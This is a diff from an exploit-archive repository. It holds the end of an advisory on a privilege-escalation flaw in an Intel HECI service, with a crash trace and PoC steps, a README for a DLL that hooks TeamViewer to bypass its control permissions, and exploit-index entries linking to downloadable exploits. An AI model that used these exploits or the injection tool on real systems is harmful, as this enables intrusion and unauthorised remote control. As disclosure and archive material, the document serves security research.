0b (Inline) -------- combase!InvokeStubWithExceptionPolicyAndTracing+0x8e [onecore\com\combase\dcomrem\channelb.cxx @ 1822]
0c 0126f78c 75307330 combase!DefaultStubInvoke+0x221 [onecore\com\combase\dcomrem\channelb.cxx @ 1891]
0d (Inline) -------- combase!SyncStubCall::Invoke+0x22 [onecore\com\combase\dcomrem\channelb.cxx @ 1948]
0e (Inline) -------- combase!SyncServerCall::StubInvoke+0x22 [onecore\com\combase\dcomrem\servercall.hpp @ 779]
0f (Inline) -------- combase!StubInvoke+0x287 [onecore\com\combase\dcomrem\channelb.cxx @ 2173]
10 0126f90c 7530009b combase!ServerCall::ContextInvoke+0x440 [onecore\com\combase\dcomrem\ctxchnl.cxx @ 1541]
11 (Inline) -------- combase!CServerChannel::ContextInvoke+0x669 [onecore\com\combase\dcomrem\ctxchnl.cxx @ 1437]
12 (Inline) -------- combase!DefaultInvokeInApartment+0x669 [onecore\com\combase\dcomrem\callctrl.cxx @ 3532]
13 (Inline) -------- combase!ClassicSTAInvokeInApartment+0x669 [onecore\com\combase\dcomrem\callctrl.cxx @ 3296]
14 0126f9ac 75302b39 combase!AppInvoke+0x8bb [onecore\com\combase\dcomrem\channelb.cxx @ 1604]
15 0126fb3c 7530ff85 combase!ComInvokeWithLockAndIPID+0x599 [onecore\com\combase\dcomrem\channelb.cxx @ 2722]
16 0126fb98 7531056b combase!ComInvoke+0x1c5 [onecore\com\combase\dcomrem\channelb.cxx @ 2242]
17 (Inline) -------- combase!ThreadDispatch+0x83 [onecore\com\combase\dcomrem\chancont.cxx @ 421]
18 0126fbd8 76b12b5b combase!ThreadWndProc+0x21b [onecore\com\combase\dcomrem\chancont.cxx @ 741]
19 0126fc04 76b050f3 USER32!_InternalCallWinProc+0x2b
1a 0126fcec 76b04a82 USER32!UserCallWinProcCheckWow+0x2d3
1b 0126fd60 76b04850 USER32!DispatchMessageWorker+0x222
1c 0126fd6c 010364e1 USER32!DispatchMessageW+0x10
1d 0126fda0 01037039 IntelCpHeciSvc+0x164e1
1e 0126fda8 0103e562 IntelCpHeciSvc+0x17039
1f 0126fde0 0103e5ec IntelCpHeciSvc+0x1e562
20 0126fdec 76928744 IntelCpHeciSvc+0x1e5ec
21 0126fe00 770a582d KERNEL32!BaseThreadInitThunk+0x24
22 0126fe48 770a57fd ntdll!__RtlUserThreadStart+0x2f
23 0126fe58 00000000 ntdll!_RtlUserThreadStart+0x1b
Proof of Concept:
Ive provided a PoC as a VS project which you can run which will cause the service to access invalid memory. Note that youll need a debugger attached to IntelCpHeciSvc.exe as the RPC/DCOM dispatch will swallow the exception, it doesnt crash the service. The Poc builds a fake SAFEARRAY structure and passes it as a BSTR to the service which gets interpreted as a pointer to a SAFEARRAY. Ultimately it tries to copy the array and will call AddRef on elements of the array.
1) Attach a debugger to IntelCpHeciSvc.exe
2) Compile and run the provided poc.
Expected Result:
Sending the fake SAFEARRAY should fail.
Observed Result:
The service tries to execute invalid memory at 0x18181818 (or at least crashes on an invalid memory location).
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43373.zip

34
exploits/windows/local/43366.md Normal file
View file

@ -0,0 +1,34 @@
# TeamViewer Permissions Hook V1
---
[![License](http://img.shields.io/badge/license-MIT-green.svg)](https://github.com/gellin/TeamViewer_Permissions_Hook_V1/blob/master/LICENSE)
**A proof of concept injectable C++ DLL, that uses naked inline hooking and direct memory modification to change TeamViewer permissions.**
## Features
* **As the Server** - Enables extra menu item options on the right side pop-up menu. Most useful so far to enable the "switch sides" feature which is normally only active after you have already authenticated control with the client, and initiated a change of control/sides.
* **As the Client** - Allows for control of mouse with disregard to servers current control settings and permissions.
## Demo
#### As the Server
![](https://raw.githubusercontent.com/gellin/TeamViewer_Permissions_Hook_V1/84b3aecd8f65f138989d460740b52195f0b1e1ac/server_switch_sides.gif)
#### Client
![](https://raw.githubusercontent.com/gellin/TeamViewer_Permissions_Hook_V1/84b3aecd8f65f138989d460740b52195f0b1e1ac/client_takes_control.gif)
## Rundown
* Utilizes signature/pattern scanning to dynamically locate key parts in the code at which the assembly registers hold pointers to interesting classes. Applies inline naked hooks a.k.a code caves, to hi-jack the pointers to use for modification via direct memory access to their reversed classes.
* Inject and follow the steps
## Requirements
* Your favorite Manual Mapper, PE Loader, DLL Injector, inject into - "TeamViewer.exe"
* This version was Built on Windows 10, for TeamViewer x86 Version 13.0.5058 - (Other versions of TeamViewer have not been tested but with more robust signatures it may work, linux not supported)
## Disclaimer
* Developed for educational purposes as a proof of concept for testing. I do not condone the or support the use of this software for unethical or illicit purposes. No responsibility is held or accepted for misuse.
## Credit
[@timse93](https://github.com/timse93) - Research and Testing
## EDB-Note
Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43366.zip

12
files_exploits.csv
View file

@ -5424,6 +5424,13 @@ id,file,description,date,author,type,platform,port
43352,exploits/windows/dos/43352.py,"CDex 1.96 - Buffer Overflow",2017-12-18,bzyo,dos,windows,
43354,exploits/linux/dos/43354.txt,"Zoom Linux Client 2.0.106600.0904 - Command Injection",2017-12-18,Conviso,dos,linux,
43355,exploits/linux/dos/43355.txt,"Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow",2017-12-18,Conviso,dos,linux,
43367,exploits/windows/dos/43367.html,"Microsoft Windows - 'jscript!NameTbl::GetValDef' Use-After-Free",2017-12-19,"Google Security Research",dos,windows,
43368,exploits/windows/dos/43368.html,"Microsoft Internet Explorer 11 - 'jscript!JSONStringifyObject' Use-After-Free",2017-12-19,"Google Security Research",dos,windows,
43369,exploits/windows/dos/43369.html,"Microsoft Windows - 'jscript!RegExpComp::Compile' Heap Overflow Through IE or Local Network via WPAD",2017-12-19,"Google Security Research",dos,windows,
43370,exploits/windows/dos/43370.html,"Microsoft Windows - jscript.dll 'Array.sort' Heap Overflow",2017-12-19,"Google Security Research",dos,windows,
43371,exploits/windows/dos/43371.html,"Microsoft Windows - 'jscript!JsArraySlice' Uninitialized Variable",2017-12-19,"Google Security Research",dos,windows,
43372,exploits/windows/dos/43372.html,"Microsoft Windows - 'jscript!RegExpFncObj::LastParen' Out-of-Bounds Read",2017-12-19,"Google Security Research",dos,windows,
43373,exploits/windows/dos/43373.txt,"Intel Content Protection HECI Service - Type Confusion Privilege Escalation",2017-12-19,"Google Security Research",dos,windows,
41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
@ -9223,6 +9230,7 @@ id,file,description,date,author,type,platform,port
41607,exploits/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",local,windows,
41619,exploits/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows,
43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change (PoC)",2017-12-04,gellin,local,windows,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -15850,6 +15858,8 @@ id,file,description,date,author,type,platform,port
43353,exploits/android/remote/43353.py,"Outlook for Android - Attachment Download Directory Traversal",2017-12-18,"Google Security Research",remote,android,
43356,exploits/php/remote/43356.rb,"Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)",2017-12-18,Metasploit,remote,php,
43360,exploits/linux/remote/43360.py,"GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution",2017-12-18,"Daniel Hodson",remote,linux,80
43374,exploits/php/remote/43374.rb,"Tuleap 9.6 - Second-Order PHP Object Injection (Metasploit)",2017-12-19,Metasploit,remote,php,443
43375,exploits/multiple/remote/43375.rb,"Jenkins - XStream Groovy classpath Deserialization (Metasploit)",2017-12-19,Metasploit,remote,multiple,8080
41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
@ -37640,6 +37650,8 @@ id,file,description,date,author,type,platform,port
43361,exploits/multiple/webapps/43361.md,"vBulletin 5 - 'routestring' Unauthenticated Remote Code Execution",2017-12-13,SecuriTeam,webapps,multiple,
43362,exploits/multiple/webapps/43362.md,"vBulletin 5 - 'cacheTemplates' Unauthenticated Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple,
43363,exploits/hardware/webapps/43363.py,"Linksys WVBR0 - 'User-Agent' Remote Command Injection",2017-12-14,nixawk,webapps,hardware,
43364,exploits/hardware/webapps/43364.txt,"BrightSign Digital Signage - Multiple Vulnerablities",2017-12-19,"Information Paradox",webapps,hardware,
43365,exploits/php/webapps/43365.txt,"Joomla! Component NextGen Editor 2.1.0 - 'plname' SQL Injection",2017-12-19,"Ihsan Sencan",webapps,php,
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,

Can't render this file because it is too large.